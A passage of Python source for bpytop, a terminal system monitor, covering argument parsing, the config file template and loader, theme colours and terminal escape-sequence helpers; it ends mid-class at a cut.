# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, sys, io, threading, signal, re, subprocess, logging, logging.handlers, argparse
import urllib.request
from time import time, sleep, strftime, tzset
from datetime import timedelta
from _thread import interrupt_main
from collections import defaultdict
from select import select
from string import Template
from math import ceil, floor
from random import randint
from shutil import which
from typing import List, Dict, Tuple, Union, Any, Iterable
errors: List[str] = []
try: import fcntl, termios, tty, pwd
except Exception as e: errors.append(f'{e}')
try: import psutil # type: ignore
except Exception as e: errors.append(f'{e}')
SELF_START = time()
SYSTEM: str
if "linux" in sys.platform: SYSTEM = "Linux"
elif "bsd" in sys.platform: SYSTEM = "BSD"
elif "darwin" in sys.platform: SYSTEM = "MacOS"
else: SYSTEM = "Other"
if errors:
print("ERROR!")
print("\n".join(errors))
if SYSTEM == "Other":
print("\nUnsupported platform!\n")
else:
print("\nInstall required modules!\n")
raise SystemExit(1)
VERSION: str = "1.0.68"
#? Argument parser ------------------------------------------------------------------------------->
args = argparse.ArgumentParser()
args.add_argument("-b", "--boxes", action="store", dest="boxes", help = "which boxes to show at start, example: -b \"cpu mem net proc\"")
args.add_argument("-lc", "--low-color", action="store_true", help = "disable truecolor, converts 24-bit colors to 256-color")
args.add_argument("-v", "--version", action="store_true", help = "show version info and exit")
args.add_argument("--debug", action="store_true", help = "start with loglevel set to DEBUG overriding value set in config")
stdargs = args.parse_args()
if stdargs.version:
print(f'bpytop version: {VERSION}\n'
f'psutil version: {".".join(str(x) for x in psutil.version_info)}')
raise SystemExit(0)
ARG_BOXES: str = stdargs.boxes
LOW_COLOR: bool = stdargs.low_color
DEBUG: bool = stdargs.debug
#? Variables ------------------------------------------------------------------------------------->
BANNER_SRC: List[Tuple[str, str, str]] = [
("#ffa50a", "#0fd7ff", "██████╗ ██████╗ ██╗ ██╗████████╗ ██████╗ ██████╗"),
("#f09800", "#00bfe6", "██╔══██╗██╔══██╗╚██╗ ██╔╝╚══██╔══╝██╔═══██╗██╔══██╗"),
("#db8b00", "#00a6c7", "██████╔╝██████╔╝ ╚████╔╝ ██║ ██║ ██║██████╔╝"),
("#c27b00", "#008ca8", "██╔══██╗██╔═══╝ ╚██╔╝ ██║ ██║ ██║██╔═══╝ "),
("#a86b00", "#006e85", "██████╔╝██║ ██║ ██║ ╚██████╔╝██║"),
("#000000", "#000000", "╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝"),
]
#*?This is the template used to create the config file
DEFAULT_CONF: Template = Template(f'#? Config file for bpytop v. {VERSION}' + '''
#* Color theme, looks for a .theme file in "/usr/[local/]share/bpytop/themes" and "~/.config/bpytop/themes", "Default" for builtin default theme.
#* Prefix name by a plus sign (+) for a theme located in user themes folder, i.e. color_theme="+monokai"
color_theme="$color_theme"
#* If the theme set background should be shown, set to False if you want terminal background transparency
theme_background=$theme_background
#* Sets if 24-bit truecolor should be used, will convert 24-bit colors to 256 color (6x6x6 color cube) if false.
truecolor=$truecolor
#* Manually set which boxes to show. Available values are "cpu mem net proc", separate values with whitespace.
shown_boxes="$shown_boxes"
#* Update time in milliseconds, increases automatically if set below the internal loop's processing time, recommended 2000 ms or above for better sample times for graphs.
update_ms=$update_ms
#* Processes update multiplier, sets how often the process list is updated as a multiplier of "update_ms".
#* Set to 2 or higher to greatly decrease bpytop cpu usage. (Only integers)
proc_update_mult=$proc_update_mult
#* Processes sorting, "pid" "program" "arguments" "threads" "user" "memory" "cpu lazy" "cpu responsive",
#* "cpu lazy" updates top process over time, "cpu responsive" updates top process directly.
proc_sorting="$proc_sorting"
#* Reverse sorting order, True or False.
proc_reversed=$proc_reversed
#* Show processes as a tree
proc_tree=$proc_tree
#* Which depth the tree view should auto collapse processes at
tree_depth=$tree_depth
#* Use the cpu graph colors in the process list.
proc_colors=$proc_colors
#* Use a darkening gradient in the process list.
proc_gradient=$proc_gradient
#* If process cpu usage should be of the core it's running on or usage of the total available cpu power.
proc_per_core=$proc_per_core
#* Show process memory as bytes instead of percent
proc_mem_bytes=$proc_mem_bytes
#* Sets the CPU stat shown in upper half of the CPU graph, "total" is always available, see:
#* https://psutil.readthedocs.io/en/latest/#psutil.cpu_times for attributes available on specific platforms.
#* Select from a list of detected attributes from the options menu
cpu_graph_upper="$cpu_graph_upper"
#* Sets the CPU stat shown in lower half of the CPU graph, "total" is always available, see:
#* https://psutil.readthedocs.io/en/latest/#psutil.cpu_times for attributes available on specific platforms.
#* Select from a list of detected attributes from the options menu
cpu_graph_lower="$cpu_graph_lower"
#* Toggles if the lower CPU graph should be inverted.
cpu_invert_lower=$cpu_invert_lower
#* Set to True to completely disable the lower CPU graph.
cpu_single_graph=$cpu_single_graph
#* Shows the system uptime in the CPU box.
show_uptime=$show_uptime
#* Check cpu temperature, needs "osx-cpu-temp" on MacOS X.
check_temp=$check_temp
#* Which sensor to use for cpu temperature, use options menu to select from list of available sensors.
cpu_sensor=$cpu_sensor
#* Show temperatures for cpu cores also if check_temp is True and sensors has been found
show_coretemp=$show_coretemp
#* Which temperature scale to use, available values: "celsius", "fahrenheit", "kelvin" and "rankine"
temp_scale="$temp_scale"
#* Show CPU frequency, can cause slowdowns on certain systems with some versions of psutil
show_cpu_freq=$show_cpu_freq
#* Draw a clock at top of screen, formatting according to strftime, empty string to disable.
draw_clock="$draw_clock"
#* Update main ui in background when menus are showing, set this to false if the menus are flickering too much for comfort.
background_update=$background_update
#* Custom cpu model name, empty string to disable.
custom_cpu_name="$custom_cpu_name"
#* Optional filter for shown disks, should be full path of a mountpoint, separate multiple values with a comma ",".
#* Begin line with "exclude=" to change to exclude filter, otherwise defaults to "most include" filter. Example: disks_filter="exclude=/boot, /home/user"
disks_filter="$disks_filter"
#* Show graphs instead of meters for memory values.
mem_graphs=$mem_graphs
#* If swap memory should be shown in memory box.
show_swap=$show_swap
#* Show swap as a disk, ignores show_swap value above, inserts itself after first disk.
swap_disk=$swap_disk
#* If mem box should be split to also show disks info.
show_disks=$show_disks
#* Filter out non physical disks. Set this to False to include network disks, RAM disks and similar.
only_physical=$only_physical
#* Read disks list from /etc/fstab. This also disables only_physical.
use_fstab=$use_fstab
#* Toggles if io stats should be shown in regular disk usage view
show_io_stat=$show_io_stat
#* Toggles io mode for disks, showing only big graphs for disk read/write speeds.
io_mode=$io_mode
#* Set to True to show combined read/write io graphs in io mode.
io_graph_combined=$io_graph_combined
#* Set the top speed for the io graphs in MiB/s (10 by default), use format "device:speed" separate disks with a comma ",".
#* Example: "/dev/sda:100, /dev/sdb:20"
io_graph_speeds="$io_graph_speeds"
#* Set fixed values for network graphs, default "10M" = 10 Mibibytes, possible units "K", "M", "G", append with "bit" for bits instead of bytes, i.e "100mbit"
net_download="$net_download"
net_upload="$net_upload"
#* Start in network graphs auto rescaling mode, ignores any values set above and rescales down to 10 Kibibytes at the lowest.
net_auto=$net_auto
#* Sync the scaling for download and upload to whichever currently has the highest scale
net_sync=$net_sync
#* If the network graphs color gradient should scale to bandwidth usage or auto scale, bandwidth usage is based on "net_download" and "net_upload" values
net_color_fixed=$net_color_fixed
#* Starts with the Network Interface specified here.
net_iface="$net_iface"
#* Show battery stats in top right if battery is present
show_battery=$show_battery
#* Show init screen at startup, the init screen is purely cosmetic
show_init=$show_init
#* Enable check for new version from github.com/aristocratos/bpytop at start.
update_check=$update_check
#* Set loglevel for "~/.config/bpytop/error.log", levels are: "ERROR" "WARNING" "INFO" "DEBUG".
#* The level set includes all lower levels, i.e. "DEBUG" will show all logging info.
log_level=$log_level
''')
CONFIG_DIR: str = f'{os.path.expanduser("~")}/.config/bpytop'
if not os.path.isdir(CONFIG_DIR):
try:
os.makedirs(CONFIG_DIR)
os.mkdir(f'{CONFIG_DIR}/themes')
except PermissionError:
print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!')
raise SystemExit(1)
CONFIG_FILE: str = f'{CONFIG_DIR}/bpytop.conf'
THEME_DIR: str = ""
if os.path.isdir(f'{os.path.dirname(__file__)}/bpytop-themes'):
THEME_DIR = f'{os.path.dirname(__file__)}/bpytop-themes'
elif os.path.isdir(f'{os.path.dirname(__file__)}/themes'):
THEME_DIR = f'{os.path.dirname(__file__)}/themes'
else:
for td in ["/usr/local/", "/usr/", "/snap/bpytop/current/usr/"]:
if os.path.isdir(f'{td}share/bpytop/themes'):
THEME_DIR = f'{td}share/bpytop/themes'
break
USER_THEME_DIR: str = f'{CONFIG_DIR}/themes'
CORES: int = psutil.cpu_count(logical=False) or 1
THREADS: int = psutil.cpu_count(logical=True) or 1
THREAD_ERROR: int = 0
DEFAULT_THEME: Dict[str, str] = {
"main_bg" : "#00",
"main_fg" : "#cc",
"title" : "#ee",
"hi_fg" : "#969696",
"selected_bg" : "#7e2626",
"selected_fg" : "#ee",
"inactive_fg" : "#40",
"graph_text" : "#60",
"meter_bg" : "#40",
"proc_misc" : "#0de756",
"cpu_box" : "#3d7b46",
"mem_box" : "#8a882e",
"net_box" : "#423ba5",
"proc_box" : "#923535",
"div_line" : "#30",
"temp_start" : "#4897d4",
"temp_mid" : "#5474e8",
"temp_end" : "#ff40b6",
"cpu_start" : "#50f095",
"cpu_mid" : "#f2e266",
"cpu_end" : "#fa1e1e",
"free_start" : "#223014",
"free_mid" : "#b5e685",
"free_end" : "#dcff85",
"cached_start" : "#0b1a29",
"cached_mid" : "#74e6fc",
"cached_end" : "#26c5ff",
"available_start" : "#292107",
"available_mid" : "#ffd77a",
"available_end" : "#ffb814",
"used_start" : "#3b1f1c",
"used_mid" : "#d9626d",
"used_end" : "#ff4769",
"download_start" : "#231a63",
"download_mid" : "#4f43a3",
"download_end" : "#b0a9de",
"upload_start" : "#510554",
"upload_mid" : "#7d4180",
"upload_end" : "#dcafde",
"process_start" : "#80d0a3",
"process_mid" : "#dcd179",
"process_end" : "#d45454",
}
MENUS: Dict[str, Dict[str, Tuple[str, ...]]] = {
"options" : {
"normal" : (
"┌─┐┌─┐┌┬┐┬┌─┐┌┐┌┌─┐",
"│ │├─┘ │ ││ ││││└─┐",
"└─┘┴ ┴ ┴└─┘┘└┘└─┘"),
"selected" : (
"╔═╗╔═╗╔╦╗╦╔═╗╔╗╔╔═╗",
"║ ║╠═╝ ║ ║║ ║║║║╚═╗",
"╚═╝╩ ╩ ╩╚═╝╝╚╝╚═╝") },
"help" : {
"normal" : (
"┬ ┬┌─┐┬ ┌─┐",
"├─┤├┤ │ ├─┘",
"┴ ┴└─┘┴─┘┴ "),
"selected" : (
"╦ ╦╔═╗╦ ╔═╗",
"╠═╣║╣ ║ ╠═╝",
"╩ ╩╚═╝╩═╝╩ ") },
"quit" : {
"normal" : (
"┌─┐ ┬ ┬ ┬┌┬┐",
"│─┼┐│ │ │ │ ",
"└─┘└└─┘ ┴ ┴ "),
"selected" : (
"╔═╗ ╦ ╦ ╦╔╦╗ ",
"║═╬╗║ ║ ║ ║ ",
"╚═╝╚╚═╝ ╩ ╩ ") }
}
MENU_COLORS: Dict[str, Tuple[str, ...]] = {
"normal" : ("#0fd7ff", "#00bfe6", "#00a6c7", "#008ca8"),
"selected" : ("#ffa50a", "#f09800", "#db8b00", "#c27b00")
}
#? Units for floating_humanizer function
UNITS: Dict[str, Tuple[str, ...]] = {
"bit" : ("bit", "Kib", "Mib", "Gib", "Tib", "Pib", "Eib", "Zib", "Yib", "Bib", "GEb"),
"byte" : ("Byte", "KiB", "MiB", "GiB", "TiB", "PiB", "EiB", "ZiB", "YiB", "BiB", "GEB")
}
SUBSCRIPT: Tuple[str, ...] = ("₀", "₁", "₂", "₃", "₄", "₅", "₆", "₇", "₈", "₉")
SUPERSCRIPT: Tuple[str, ...] = ("⁰", "¹", "²", "³", "⁴", "⁵", "⁶", "⁷", "⁸", "⁹")
#? Setup error logger ---------------------------------------------------------------->
try:
errlog = logging.getLogger("ErrorLogger")
errlog.setLevel(logging.DEBUG)
eh = logging.handlers.RotatingFileHandler(f'{CONFIG_DIR}/error.log', maxBytes=1048576, backupCount=4)
eh.setLevel(logging.DEBUG)
eh.setFormatter(logging.Formatter("%(asctime)s | %(levelname)s: %(message)s", datefmt="%d/%m/%y (%X)"))
errlog.addHandler(eh)
except PermissionError:
print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!')
raise SystemExit(1)
#? Timers for testing and debugging -------------------------------------------------------------->
class TimeIt:
timers: Dict[str, float] = {}
paused: Dict[str, float] = {}
@classmethod
def start(cls, name):
cls.timers[name] = time()
@classmethod
def pause(cls, name):
if name in cls.timers:
cls.paused[name] = time() - cls.timers[name]
del cls.timers[name]
@classmethod
def stop(cls, name):
if name in cls.timers:
total: float = time() - cls.timers[name]
del cls.timers[name]
if name in cls.paused:
total += cls.paused[name]
del cls.paused[name]
errlog.debug(f'{name} completed in {total:.6f} seconds')
def timeit_decorator(func):
def timed(*args, **kw):
ts = time()
out = func(*args, **kw)
errlog.debug(f'{func.__name__} completed in {time() - ts:.6f} seconds')
return out
return timed
#? Issue #364 ----------------------------------------------------------->
def strtobool(val: str) -> bool:
"""Convert a string representation of truth to true (1) or false (0).
True values are 'y', 'yes', 't', 'true', 'on', and '1'; false values
are 'n', 'no', 'f', 'false', 'off', and '0'. Raises ValueError if
'val' is anything else.
"""
try:
val = val.lower()
except AttributeError:
raise ValueError(f"invalid type {type(val)} for truth value {val}")
if val in ('y', 'yes', 't', 'true', 'on', '1'):
return True
elif val in ('n', 'no', 'f', 'false', 'off', '0'):
return False
else:
raise ValueError(f"invalid truth value {val}")
#? Set up config class and load config ----------------------------------------------------------->
class Config:
'''Holds all config variables and functions for loading from and saving to disk'''
keys: List[str] = ["color_theme", "update_ms", "proc_sorting", "proc_reversed", "proc_tree", "check_temp", "draw_clock", "background_update", "custom_cpu_name",
"proc_colors", "proc_gradient", "proc_per_core", "proc_mem_bytes", "disks_filter", "update_check", "log_level", "mem_graphs", "show_swap",
"swap_disk", "show_disks", "use_fstab", "net_download", "net_upload", "net_auto", "net_color_fixed", "show_init", "theme_background",
"net_sync", "show_battery", "tree_depth", "cpu_sensor", "show_coretemp", "proc_update_mult", "shown_boxes", "net_iface", "only_physical",
"truecolor", "io_mode", "io_graph_combined", "io_graph_speeds", "show_io_stat", "cpu_graph_upper", "cpu_graph_lower", "cpu_invert_lower",
"cpu_single_graph", "show_uptime", "temp_scale", "show_cpu_freq"]
conf_dict: Dict[str, Union[str, int, bool]] = {}
color_theme: str = "Default"
theme_background: bool = True
truecolor: bool = True
shown_boxes: str = "cpu mem net proc"
update_ms: int = 2000
proc_update_mult: int = 2
proc_sorting: str = "cpu lazy"
proc_reversed: bool = False
proc_tree: bool = False
tree_depth: int = 3
proc_colors: bool = True
proc_gradient: bool = True
proc_per_core: bool = False
proc_mem_bytes: bool = True
cpu_graph_upper: str = "total"
cpu_graph_lower: str = "total"
cpu_invert_lower: bool = True
cpu_single_graph: bool = False
show_uptime: bool = True
check_temp: bool = True
cpu_sensor: str = "Auto"
show_coretemp: bool = True
temp_scale: str = "celsius"
show_cpu_freq: bool = True
draw_clock: str = "%X"
background_update: bool = True
custom_cpu_name: str = ""
disks_filter: str = ""
update_check: bool = True
mem_graphs: bool = True
show_swap: bool = True
swap_disk: bool = True
show_disks: bool = True
only_physical: bool = True
use_fstab: bool = False
show_io_stat: bool = True
io_mode: bool = False
io_graph_combined: bool = False
io_graph_speeds: str = ""
net_download: str = "10M"
net_upload: str = "10M"
net_color_fixed: bool = False
net_auto: bool = True
net_sync: bool = False
net_iface: str = ""
show_battery: bool = True
show_init: bool = False
log_level: str = "WARNING"
warnings: List[str] = []
info: List[str] = []
sorting_options: List[str] = ["pid", "program", "arguments", "threads", "user", "memory", "cpu lazy", "cpu responsive"]
log_levels: List[str] = ["ERROR", "WARNING", "INFO", "DEBUG"]
cpu_percent_fields: List = ["total"]
cpu_percent_fields.extend(getattr(psutil.cpu_times_percent(), "_fields", []))
temp_scales: List[str] = ["celsius", "fahrenheit", "kelvin", "rankine"]
cpu_sensors: List[str] = [ "Auto" ]
if hasattr(psutil, "sensors_temperatures"):
try:
_temps = psutil.sensors_temperatures()
if _temps:
for _name, _entries in _temps.items():
for _num, _entry in enumerate(_entries, 1):
if hasattr(_entry, "current"):
cpu_sensors.append(f'{_name}:{_num if _entry.label == "" else _entry.label}')
except:
pass
changed: bool = False
recreate: bool = False
config_file: str = ""
_initialized: bool = False
def __init__(self, path: str):
self.config_file = path
conf: Dict[str, Union[str, int, bool]] = self.load_config()
if not "version" in conf.keys():
self.recreate = True
self.info.append(f'Config file malformed or missing, will be recreated on exit!')
elif conf["version"] != VERSION:
self.recreate = True
self.info.append(f'Config file version and bpytop version mismatch, will be recreated on exit!')
for key in self.keys:
if key in conf.keys() and conf[key] != "_error_":
setattr(self, key, conf[key])
else:
self.recreate = True
self.conf_dict[key] = getattr(self, key)
self._initialized = True
def __setattr__(self, name, value):
if self._initialized:
object.__setattr__(self, "changed", True)
object.__setattr__(self, name, value)
if name not in ["_initialized", "recreate", "changed"]:
self.conf_dict[name] = value
def load_config(self) -> Dict[str, Union[str, int, bool]]:
'''Load config from file, set correct types for values and return a dict'''
new_config: Dict[str,Union[str, int, bool]] = {}
conf_file: str = ""
if os.path.isfile(self.config_file):
conf_file = self.config_file
elif SYSTEM == "BSD" and os.path.isfile("/usr/local/etc/bpytop.conf"):
conf_file = "/usr/local/etc/bpytop.conf"
elif SYSTEM != "BSD" and os.path.isfile("/etc/bpytop.conf"):
conf_file = "/etc/bpytop.conf"
else:
return new_config
try:
with open(conf_file, "r") as f:
for line in f:
line = line.strip()
if line.startswith("#? Config"):
new_config["version"] = line[line.find("v. ") + 3:]
continue
if not '=' in line:
continue
key, line = line.split('=', maxsplit=1)
if not key in self.keys:
continue
line = line.strip('"')
if type(getattr(self, key)) == int:
try:
new_config[key] = int(line)
except ValueError:
self.warnings.append(f'Config key "{key}" should be an integer!')
if type(getattr(self, key)) == bool:
try:
new_config[key] = bool(strtobool(line))
except ValueError:
self.warnings.append(f'Config key "{key}" can only be True or False!')
if type(getattr(self, key)) == str:
new_config[key] = str(line)
except Exception as e:
errlog.exception(str(e))
if "proc_sorting" in new_config and not new_config["proc_sorting"] in self.sorting_options:
new_config["proc_sorting"] = "_error_"
self.warnings.append(f'Config key "proc_sorted" didn\'t get an acceptable value!')
if "log_level" in new_config and not new_config["log_level"] in self.log_levels:
new_config["log_level"] = "_error_"
self.warnings.append(f'Config key "log_level" didn\'t get an acceptable value!')
if "update_ms" in new_config and int(new_config["update_ms"]) < 100:
new_config["update_ms"] = 100
self.warnings.append(f'Config key "update_ms" can\'t be lower than 100!')
for net_name in ["net_download", "net_upload"]:
if net_name in new_config and not new_config[net_name][0].isdigit(): # type: ignore
new_config[net_name] = "_error_"
if "cpu_sensor" in new_config and not new_config["cpu_sensor"] in self.cpu_sensors:
new_config["cpu_sensor"] = "_error_"
self.warnings.append(f'Config key "cpu_sensor" does not contain an available sensor!')
if "shown_boxes" in new_config and not new_config["shown_boxes"] == "":
for box in new_config["shown_boxes"].split(): #type: ignore
if not box in ["cpu", "mem", "net", "proc"]:
new_config["shown_boxes"] = "_error_"
self.warnings.append(f'Config key "shown_boxes" contains invalid box names!')
break
for cpu_graph in ["cpu_graph_upper", "cpu_graph_lower"]:
if cpu_graph in new_config and not new_config[cpu_graph] in self.cpu_percent_fields:
new_config[cpu_graph] = "_error_"
self.warnings.append(f'Config key "{cpu_graph}" does not contain an available cpu stat attribute!')
if "temp_scale" in new_config and not new_config["temp_scale"] in self.temp_scales:
new_config["temp_scale"] = "_error_"
self.warnings.append(f'Config key "temp_scale" does not contain a recognized temperature scale!')
return new_config
def save_config(self):
'''Save current config to config file if values or version differ, creates a new file if not found'''
if not self.changed and not self.recreate: return
try:
with open(self.config_file, "w" if os.path.isfile(self.config_file) else "x") as f:
f.write(DEFAULT_CONF.substitute(self.conf_dict))
except Exception as e:
errlog.exception(str(e))
try:
CONFIG: Config = Config(CONFIG_FILE)
if DEBUG:
errlog.setLevel(logging.DEBUG)
else:
errlog.setLevel(getattr(logging, CONFIG.log_level))
DEBUG = CONFIG.log_level == "DEBUG"
errlog.info(f'New instance of bpytop version {VERSION} started with pid {os.getpid()}')
errlog.info(f'Loglevel set to {"DEBUG" if DEBUG else CONFIG.log_level}')
errlog.debug(f'Using psutil version {".".join(str(x) for x in psutil.version_info)}')
errlog.debug(f'CMD: {" ".join(sys.argv)}')
if CONFIG.info:
for info in CONFIG.info:
errlog.info(info)
CONFIG.info = []
if CONFIG.warnings:
for warning in CONFIG.warnings:
errlog.warning(warning)
CONFIG.warnings = []
except Exception as e:
errlog.exception(f'{e}')
raise SystemExit(1)
if ARG_BOXES:
_new_boxes: List = []
for _box in ARG_BOXES.split():
if _box in ["cpu", "mem", "net", "proc"]:
_new_boxes.append(_box)
CONFIG.shown_boxes = " ".join(_new_boxes)
del _box, _new_boxes
if SYSTEM == "Linux" and not os.path.isdir("/sys/class/power_supply"):
CONFIG.show_battery = False
if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7):
warn = f'psutil version {".".join(str(x) for x in psutil.version_info)} detected, version 5.7.0 or later required for full functionality!'
print("WARNING!", warn)
errlog.warning(warn)
#? Classes --------------------------------------------------------------------------------------->
class Term:
"""Terminal info and commands"""
width: int = 0
height: int = 0
resized: bool = False
_w : int = 0
_h : int = 0
fg: str = "" #* Default foreground color
bg: str = "" #* Default background color
hide_cursor = "\033[?25l" #* Hide terminal cursor
show_cursor = "\033[?25h" #* Show terminal cursor
alt_screen = "\033[?1049h" #* Switch to alternate screen
normal_screen = "\033[?1049l" #* Switch to normal screen
clear = "\033[2J\033[0;0f" #* Clear screen and set cursor to position 0,0
mouse_on = "\033[?1002h\033[?1015h\033[?1006h" #* Enable reporting of mouse position on click and release
mouse_off = "\033[?1002l" #* Disable mouse reporting
mouse_direct_on = "\033[?1003h" #* Enable reporting of mouse position at any movement
mouse_direct_off = "\033[?1003l" #* Disable direct mouse reporting
winch = threading.Event()
old_boxes: List = []
min_width: int = 0
min_height: int = 0
@classmethod
def refresh(cls, *args, force: bool = False):
"""Update width, height and set resized flag if terminal has been resized"""
if Init.running: cls.resized = False; return
if cls.resized: cls.winch.set(); return
cls._w, cls._h = os.get_terminal_size()
if (cls._w, cls._h) == (cls.width, cls.height) and cls.old_boxes == Box.boxes and not force: return
if force: Collector.collect_interrupt = True
if cls.old_boxes != Box.boxes:
w_p = h_p = 0
cls.min_width = cls.min_height = 0
cls.old_boxes = Box.boxes.copy()
for box_class in Box.__subclasses__():
for box_name in Box.boxes:
if box_name in str(box_class).capitalize():
if not (box_name == "cpu" and "proc" in Box.boxes) and not (box_name == "net" and "mem" in Box.boxes) and w_p + box_class.width_p <= 100:
w_p += box_class.width_p
cls.min_width += getattr(box_class, "min_w", 0)
if not (box_name in ["mem", "net"] and "proc" in Box.boxes) and h_p + box_class.height_p <= 100:
h_p += box_class.height_p
cls.min_height += getattr(box_class, "min_h", 0)
while (cls._w, cls._h) != (cls.width, cls.height) or (cls._w < cls.min_width or cls._h < cls.min_height):
if Init.running: Init.resized = True
CpuBox.clock_block = True
cls.resized = True
Collector.collect_interrupt = True
cls.width, cls.height = cls._w, cls._h
Draw.now(Term.clear)
box_width = min(50, cls._w - 2)
Draw.now(f'{create_box(cls._w // 2 - box_width // 2, cls._h // 2 - 2, 50, 3, "resizing", line_color=Colors.green, title_color=Colors.white)}',
f'{Mv.r(box_width // 4)}{Colors.default}{Colors.black_bg}{Fx.b}Width : {cls._w} Height: {cls._h}{Fx.ub}{Term.bg}{Term.fg}')
if cls._w < 80 or cls._h < 24:
while cls._w < cls.min_width or cls._h < cls.min_height:
Draw.now(Term.clear)
box_width = min(50, cls._w - 2)
Draw.now(f'{create_box(cls._w // 2 - box_width // 2, cls._h // 2 - 2, box_width, 4, "warning", line_color=Colors.red, title_color=Colors.white)}',
f'{Mv.r(box_width // 4)}{Colors.default}{Colors.black_bg}{Fx.b}Width: {Colors.red if cls._w < cls.min_width else Colors.green}{cls._w} ',
f'{Colors.default}Height: {Colors.red if cls._h < cls.min_height else Colors.green}{cls._h}{Term.bg}{Term.fg}',
f'{Mv.d(1)}{Mv.l(25)}{Colors.default}{Colors.black_bg}Current config needs: {cls.min_width} x {cls.min_height}{Fx.ub}{Term.bg}{Term.fg}')
cls.winch.wait(0.3)
while Key.has_key():
if Key.last() == "q": clean_quit()
cls.winch.clear()
cls._w, cls._h = os.get_terminal_size()
else:
cls.winch.wait(0.3)
cls.winch.clear()
cls._w, cls._h = os.get_terminal_size()
Key.mouse = {}
Box.calc_sizes()
Collector.proc_counter = 1
if Menu.active: Menu.resized = True
Box.draw_bg(now=False)
cls.resized = False
Timer.finish()
@staticmethod
def echo(on: bool):
"""Toggle input echo"""
(iflag, oflag, cflag, lflag, ispeed, ospeed, cc) = termios.tcgetattr(sys.stdin.fileno())
if on:
lflag |= termios.ECHO # type: ignore
else:
lflag &= ~termios.ECHO # type: ignore
new_attr = [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]
termios.tcsetattr(sys.stdin.fileno(), termios.TCSANOW, new_attr)
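#* Return an escape sequence that sets the terminal title, prefixed by the value of $TERMINAL_TITLE if set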
@staticmethod
def title(text: str = "") -> str:
out: str = f'{os.environ.get("TERMINAL_TITLE", "")}'
if out and text: out += " "
if text: out += f'{text}'
return f'\033]0;{out}\a'
class Fx:
"""Text effects
* trans(string: str): Replace whitespace with a cursor-right escape to avoid overwriting the background behind the whitespace.
* uncolor(string: str) : Removes all 24-bit color escape sequences from the string and returns it."""
start = "\033[" #* Escape sequence start
sep = ";" #* Escape sequence separator
end = "m" #* Escape sequence end
reset = rs = "\033[0m" #* Reset foreground/background color and text effects
bold = b = "\033[1m" #* Bold on
unbold = ub = "\033[22m" #* Bold off
dark = d = "\033[2m" #* Dark on
undark = ud = "\033[22m" #* Dark off
italic = i = "\033[3m" #* Italic on
unitalic = ui = "\033[23m" #* Italic off
underline = u = "\033[4m" #* Underline on
ununderline = uu = "\033[24m" #* Underline off
blink = bl = "\033[5m" #* Blink on
unblink = ubl = "\033[25m" #* Blink off
strike = s = "\033[9m" #* Strike / crossed-out on
unstrike = us = "\033[29m" #* Strike / crossed-out off
#* Precompiled regex for finding a 24-bit color escape sequence in a string
color_re = re.compile(r"\033\[\d+;\d?;?\d*;?\d*;?\d*m")
@staticmethod
def trans(string: str):
return string.replace(" ", "\033[1C")
@classmethod
def uncolor(cls, string: str) -> str:
return f'{cls.color_re.sub("", string)}'
class Raw(object):
"""Set raw input mode for device"""
def __init__(self, stream):
self.stream = stream
self.fd = self.stream.fileno()
def __enter__(self):
self.original_stty = termios.tcgetattr(self.stream)
tty.setcbreak(self.stream)
def __exit__(self, type, value, traceback):
termios.tcsetattr(self.stream, termios.TCSANOW, self.original_stty)
class Nonblocking(object):
"""Set nonblocking mode for device"""
def __init__(self, stream):
self.stream = stream
self.fd = self.stream.fileno()
def __enter__(self):
self.orig_fl = fcntl.fcntl(self.fd, fcntl.F_GETFL)
fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl | os.O_NONBLOCK)
def __exit__(self, *args):
fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl)
class Mv:
"""Class with collection of cursor movement functions: .t[o](line, column) | .r[ight](columns) | .l[eft](columns) | .u[p](lines) | .d[own](lines) | .save() | .restore()"""
@staticmethod
def to(line: int, col: int) -> str:
return f'\033[{line};{col}f' #* Move cursor to line, column
@staticmethod
def right(x: int) -> str: #* Move cursor right x columns
return f'\033[{x}C'
@staticmethod
def left(x: int) -> str: #* Move cursor left x columns
return f'\033[{x}D'
@staticmethod
def up(x: int) -> str: #* Move cursor up x lines
return f'\033[{x}A'
@staticmethod
def down(x: int) -> str: #* Move cursor down x lines
return f'\033[{x}B'
save: str = "\033[s" #* Save cursor position
restore: str = "\033[u" #* Restore saved cursor position
t = to
r = right
l = left
u = up
d = down
class Key:
"""Handles the threaded input reader for keypresses and mouse events"""
list: List[str] = []
mouse: Dict[str, List[List[int]]] = {}
mouse_pos: Tuple[int, int] = (0, 0)
escape: Dict[Union[str, Tuple[str, str]], str] = {
"\n" : "enter",
("\x7f", "\x08") : "backspace",
("[A", "OA") : "up",
("[B", "OB") : "down",
("[D", "OD") : "left",
("[C", "OC") : "right",
"[2~" : "insert",
"[3~" : "delete",
"[H" : "home",
"[F" : "end",
"[5~" : "page_up",
"[6~" : "page_down",
"\t" : "tab",
"[Z" : "shift_tab",
"OP" : "f1",
"OQ" : "f2",
"OR" : "f3",
"OS" : "f4",
"[15" : "f5",
"[17" : "f6",
"[18" : "f7",
"[19" : "f8",
"[20" : "f9",
"[21" : "f10",
"[23" : "f11",
"[24" : "f12"
}
new = threading.Event()
idle = threading.Event()
mouse_move = threading.Event()
mouse_report: bool = False
idle.set()
stopping: bool = False
started: bool = False
reader: threading.Thread
@classmethod
def start(cls):
cls.stopping = False
cls.reader = threading.Thread(target=cls._get_key)
cls.reader.start()
cls.started = True
@classmethod
def stop(cls):
if cls.started and cls.reader.is_alive():
cls.stopping = True
try:
cls.reader.join()
except:
pass
@classmethod
def last(cls) -> str:
if cls.list: return cls.list.pop()
else: return ""
@classmethod
def get(cls) -> str:
if cls.list: return cls.list.pop(0)
else: return ""
@classmethod
def get_mouse(cls) -> Tuple[int, int]:
if cls.new.is_set():
cls.new.clear()
return cls.mouse_pos
@classmethod
def mouse_moved(cls) -> bool:
if cls.mouse_move.is_set():
cls.mouse_move.clear()
return True
else:
return False
@classmethod
def has_key(cls) -> bool:
return bool(cls.list)
@classmethod
def clear(cls):
cls.list = []
@classmethod
